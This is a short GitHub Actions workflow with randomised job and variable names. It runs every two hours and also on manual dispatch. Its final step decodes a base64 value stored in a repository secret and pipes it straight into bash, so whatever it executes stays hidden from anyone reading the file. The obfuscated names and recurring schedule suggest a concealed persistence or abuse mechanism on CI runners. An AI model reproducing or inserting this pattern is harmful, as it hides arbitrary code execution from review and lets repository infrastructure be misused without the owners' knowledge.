name: eyPuuP
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  OYmSrHZa:
    runs-on: ubuntu-latest
    env:
      iIcjemP: ${{ secrets.wZGOrGaHAzV }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.CnQqlQv }}" | base64 -d | bash
